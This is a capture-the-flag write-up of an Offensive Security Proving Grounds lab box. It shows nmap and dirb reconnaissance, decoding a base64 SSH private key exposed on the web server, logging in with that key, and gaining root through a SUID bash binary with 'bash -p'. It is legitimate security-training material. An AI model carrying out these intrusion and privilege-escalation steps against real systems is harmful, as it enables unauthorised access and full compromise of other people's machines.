Details
This box was customized by Offensive Security and integrated in the ‘proving grounds’ lab.
In the following you see the solution of the ‘proving grounds’ version.
discovery
Performing a simple nmap scan to identify the attack surface of the target.
portscan
1
$ nmap -Pn -p- -sV 192.168.59.89
- 22 (OpenSSH)
- 80 (Apache)
- 33060 (unrecognized)
website
Performing a simple dir busting on the target
1
$ dirb http://192.168.59.89`
Wordpress seems to be installed on the web server.
Additionally
dirbwas able to identify the filesrobots.txtandsecret.txt
robots.txt: contains the path/secret.txtsecret.txt: contains abase64blob
exploitation
preparing
save the base64 blob and decode it
1
$ base64 -d blob.base64
The decoding reveals that it is an
sshprivate key!
generate the public key out of the private key to get the username
1
ssh-keygen -f ssh.priv -y > ssh.pub
usernameisoscp
getting a shell and access the first flag
1
2
3
$ ssh -i ssh.priv oscp@192.168.59.89
bash-5.0$ cat local.txt
*******************************
post exploitation
privilege escalation
Identifiy SUID binaries owned by root
1
2
3
4
$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
...
-rwsr-sr-x 1 root root 1183448 Feb 25 2020 /usr/bin/bash
...
The website gtfobins reveals that the binary bash can be exploited to gain root access.
1
2
3
-bash-5.0$ /usr/bin/bash -p
bash-5.0# whoami
root
Root!
get second flag
1
2
3
4
5
6
7
bash-5.0# cd /root/
bash-5.0# ls
fix-wordpress flag.txt proof.txt snap
bash-5.0# cat flag.txt
Your flag is in another file...
bash-5.0# cat proof.txt
1******************************8
Pwned! <@:-)